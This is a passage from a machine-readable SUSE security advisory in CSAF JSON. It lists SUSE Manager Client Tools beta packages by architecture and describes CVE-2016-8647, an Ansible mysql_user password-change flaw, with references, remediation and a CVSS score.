"product_id": "dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch"
}
},
{
"category": "product_version",
"name": "mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"product": {
"name": "mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"product_id": "mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch"
}
},
{
"category": "product_version",
"name": "mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"product": {
"name": "mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"product_id": "mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
}
},
{
"category": "product_version",
"name": "python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"product": {
"name": "python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"product_id": "python3-spacewalk-check-5.0.4-159000.6.54.2.noarch"
}
},
{
"category": "product_version",
"name": "python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"product": {
"name": "python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"product_id": "python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch"
}
},
{
"category": "product_version",
"name": "python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"product": {
"name": "python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"product_id": "python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch"
}
},
{
"category": "product_version",
"name": "spacecmd-5.0.5-159000.6.48.2.noarch",
"product": {
"name": "spacecmd-5.0.5-159000.6.48.2.noarch",
"product_id": "spacecmd-5.0.5-159000.6.48.2.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-check-5.0.4-159000.6.54.2.noarch",
"product": {
"name": "spacewalk-check-5.0.4-159000.6.54.2.noarch",
"product_id": "spacewalk-check-5.0.4-159000.6.54.2.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"product": {
"name": "spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"product_id": "spacewalk-client-setup-5.0.4-159000.6.54.2.noarch"
}
},
{
"category": "product_version",
"name": "spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"product": {
"name": "spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"product_id": "spacewalk-client-tools-5.0.4-159000.6.54.2.noarch"
}
},
{
"category": "product_version",
"name": "supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"product": {
"name": "supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"product_id": "supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.ppc64le",
"product": {
"name": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.ppc64le",
"product_id": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.ppc64le"
}
},
{
"category": "product_version",
"name": "grafana-9.5.16-159000.4.30.2.ppc64le",
"product": {
"name": "grafana-9.5.16-159000.4.30.2.ppc64le",
"product_id": "grafana-9.5.16-159000.4.30.2.ppc64le"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.7-159000.3.8.1.ppc64le",
"product": {
"name": "mgrctl-0.1.7-159000.3.8.1.ppc64le",
"product_id": "mgrctl-0.1.7-159000.3.8.1.ppc64le"
}
},
{
"category": "product_version",
"name": "uyuni-base-common-5.0.2-159000.3.21.2.ppc64le",
"product": {
"name": "uyuni-base-common-5.0.2-159000.3.21.2.ppc64le",
"product_id": "uyuni-base-common-5.0.2-159000.3.21.2.ppc64le"
}
},
{
"category": "product_version",
"name": "uyuni-base-proxy-5.0.2-159000.3.21.2.ppc64le",
"product": {
"name": "uyuni-base-proxy-5.0.2-159000.3.21.2.ppc64le",
"product_id": "uyuni-base-proxy-5.0.2-159000.3.21.2.ppc64le"
}
},
{
"category": "product_version",
"name": "uyuni-base-server-5.0.2-159000.3.21.2.ppc64le",
"product": {
"name": "uyuni-base-server-5.0.2-159000.3.21.2.ppc64le",
"product_id": "uyuni-base-server-5.0.2-159000.3.21.2.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"product": {
"name": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"product_id": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x"
}
},
{
"category": "product_version",
"name": "grafana-9.5.16-159000.4.30.2.s390x",
"product": {
"name": "grafana-9.5.16-159000.4.30.2.s390x",
"product_id": "grafana-9.5.16-159000.4.30.2.s390x"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.7-159000.3.8.1.s390x",
"product": {
"name": "mgrctl-0.1.7-159000.3.8.1.s390x",
"product_id": "mgrctl-0.1.7-159000.3.8.1.s390x"
}
},
{
"category": "product_version",
"name": "uyuni-base-common-5.0.2-159000.3.21.2.s390x",
"product": {
"name": "uyuni-base-common-5.0.2-159000.3.21.2.s390x",
"product_id": "uyuni-base-common-5.0.2-159000.3.21.2.s390x"
}
},
{
"category": "product_version",
"name": "uyuni-base-proxy-5.0.2-159000.3.21.2.s390x",
"product": {
"name": "uyuni-base-proxy-5.0.2-159000.3.21.2.s390x",
"product_id": "uyuni-base-proxy-5.0.2-159000.3.21.2.s390x"
}
},
{
"category": "product_version",
"name": "uyuni-base-server-5.0.2-159000.3.21.2.s390x",
"product": {
"name": "uyuni-base-server-5.0.2-159000.3.21.2.s390x",
"product_id": "uyuni-base-server-5.0.2-159000.3.21.2.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"product": {
"name": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"product_id": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64"
}
},
{
"category": "product_version",
"name": "grafana-9.5.16-159000.4.30.2.x86_64",
"product": {
"name": "grafana-9.5.16-159000.4.30.2.x86_64",
"product_id": "grafana-9.5.16-159000.4.30.2.x86_64"
}
},
{
"category": "product_version",
"name": "mgrctl-0.1.7-159000.3.8.1.x86_64",
"product": {
"name": "mgrctl-0.1.7-159000.3.8.1.x86_64",
"product_id": "mgrctl-0.1.7-159000.3.8.1.x86_64"
}
},
{
"category": "product_version",
"name": "uyuni-base-common-5.0.2-159000.3.21.2.x86_64",
"product": {
"name": "uyuni-base-common-5.0.2-159000.3.21.2.x86_64",
"product_id": "uyuni-base-common-5.0.2-159000.3.21.2.x86_64"
}
},
{
"category": "product_version",
"name": "uyuni-base-proxy-5.0.2-159000.3.21.2.x86_64",
"product": {
"name": "uyuni-base-proxy-5.0.2-159000.3.21.2.x86_64",
"product_id": "uyuni-base-proxy-5.0.2-159000.3.21.2.x86_64"
}
},
{
"category": "product_version",
"name": "uyuni-base-server-5.0.2-159000.3.21.2.x86_64",
"product": {
"name": "uyuni-base-server-5.0.2-159000.3.21.2.x86_64",
"product_id": "uyuni-base-server-5.0.2-159000.3.21.2.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Manager Client Tools 15-BETA",
"product": {
"name": "SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA"
}
},
{
"category": "product_name",
"name": "SUSE Manager Client Tools Beta for SLE Micro 5",
"product": {
"name": "SUSE Manager Client Tools Beta for SLE Micro 5",
"product_id": "SUSE Manager Client Tools Beta for SLE Micro 5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-manager-tools-beta-micro:5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch"
},
"product_reference": "POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch"
},
"product_reference": "POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-2.9.27-159000.3.12.2.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch"
},
"product_reference": "ansible-2.9.27-159000.3.12.2.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-doc-2.9.27-159000.3.12.2.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch"
},
"product_reference": "ansible-doc-2.9.27-159000.3.12.2.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch"
},
"product_reference": "dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-9.5.16-159000.4.30.2.aarch64 as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64"
},
"product_reference": "grafana-9.5.16-159000.4.30.2.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-9.5.16-159000.4.30.2.ppc64le as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le"
},
"product_reference": "grafana-9.5.16-159000.4.30.2.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-9.5.16-159000.4.30.2.s390x as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x"
},
"product_reference": "grafana-9.5.16-159000.4.30.2.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "grafana-9.5.16-159000.4.30.2.x86_64 as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64"
},
"product_reference": "grafana-9.5.16-159000.4.30.2.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.7-159000.3.8.1.aarch64 as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64"
},
"product_reference": "mgrctl-0.1.7-159000.3.8.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.7-159000.3.8.1.ppc64le as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le"
},
"product_reference": "mgrctl-0.1.7-159000.3.8.1.ppc64le",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.7-159000.3.8.1.s390x as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x"
},
"product_reference": "mgrctl-0.1.7-159000.3.8.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.7-159000.3.8.1.x86_64 as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64"
},
"product_reference": "mgrctl-0.1.7-159000.3.8.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch"
},
"product_reference": "mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
},
"product_reference": "mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-spacewalk-check-5.0.4-159000.6.54.2.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch"
},
"product_reference": "python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch"
},
"product_reference": "python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch"
},
"product_reference": "python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacecmd-5.0.5-159000.6.48.2.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch"
},
"product_reference": "spacecmd-5.0.5-159000.6.48.2.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-check-5.0.4-159000.6.54.2.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch"
},
"product_reference": "spacewalk-check-5.0.4-159000.6.54.2.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-client-setup-5.0.4-159000.6.54.2.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch"
},
"product_reference": "spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "spacewalk-client-tools-5.0.4-159000.6.54.2.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch"
},
"product_reference": "spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch as component of SUSE Manager Client Tools 15-BETA",
"product_id": "SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch"
},
"product_reference": "supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools 15-BETA"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64 as component of SUSE Manager Client Tools Beta for SLE Micro 5",
"product_id": "SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64"
},
"product_reference": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools Beta for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x as component of SUSE Manager Client Tools Beta for SLE Micro 5",
"product_id": "SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x"
},
"product_reference": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools Beta for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64 as component of SUSE Manager Client Tools Beta for SLE Micro 5",
"product_id": "SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64"
},
"product_reference": "golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools Beta for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.7-159000.3.8.1.aarch64 as component of SUSE Manager Client Tools Beta for SLE Micro 5",
"product_id": "SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64"
},
"product_reference": "mgrctl-0.1.7-159000.3.8.1.aarch64",
"relates_to_product_reference": "SUSE Manager Client Tools Beta for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.7-159000.3.8.1.s390x as component of SUSE Manager Client Tools Beta for SLE Micro 5",
"product_id": "SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x"
},
"product_reference": "mgrctl-0.1.7-159000.3.8.1.s390x",
"relates_to_product_reference": "SUSE Manager Client Tools Beta for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-0.1.7-159000.3.8.1.x86_64 as component of SUSE Manager Client Tools Beta for SLE Micro 5",
"product_id": "SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64"
},
"product_reference": "mgrctl-0.1.7-159000.3.8.1.x86_64",
"relates_to_product_reference": "SUSE Manager Client Tools Beta for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch as component of SUSE Manager Client Tools Beta for SLE Micro 5",
"product_id": "SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch"
},
"product_reference": "mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools Beta for SLE Micro 5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch as component of SUSE Manager Client Tools Beta for SLE Micro 5",
"product_id": "SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
},
"product_reference": "mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"relates_to_product_reference": "SUSE Manager Client Tools Beta for SLE Micro 5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2016-8647",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2016-8647"
}
],
"notes": [
{
"category": "general",
"text": "An input validation vulnerability was found in Ansible\u0027s mysql_user module before 2.2.1.0, which may fail to correctly change a password in certain circumstances. Thus the previous password would still be active when it should have been changed.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2016-8647",
"url": "https://www.suse.com/security/cve/CVE-2016-8647"
},
{
"category": "external",
"summary": "SUSE Bug 1008038 for CVE-2016-8647",
"url": "https://bugzilla.suse.com/1008038"
},
{
"category": "external",
"summary": "SUSE Bug 1010940 for CVE-2016-8647",
"url": "https://bugzilla.suse.com/1010940"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:python3-spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacecmd-5.0.5-159000.6.48.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-check-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-setup-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:spacewalk-client-tools-5.0.4-159000.6.54.2.noarch",
"SUSE Manager Client Tools 15-BETA:supportutils-plugin-susemanager-client-5.0.3-159000.6.21.2.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:golang-github-prometheus-node_exporter-1.5.0-159000.6.2.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.s390x",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-0.1.7-159000.3.8.1.x86_64",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-bash-completion-0.1.7-159000.3.8.1.noarch",
"SUSE Manager Client Tools Beta for SLE Micro 5:mgrctl-zsh-completion-0.1.7-159000.3.8.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.9,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Manager Client Tools 15-BETA:POS_Image-Graphical7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:POS_Image-JeOS7-0.1.1710765237.46af599-159000.3.24.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:ansible-doc-2.9.27-159000.3.12.2.noarch",
"SUSE Manager Client Tools 15-BETA:dracut-saltboot-0.1.1710765237.46af599-159000.3.33.2.noarch",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.aarch64",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.ppc64le",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.s390x",
"SUSE Manager Client Tools 15-BETA:grafana-9.5.16-159000.4.30.2.x86_64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.aarch64",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.ppc64le",
"SUSE Manager Client Tools 15-BETA:mgrctl-0.1.7-159000.3.8.1.s390x",
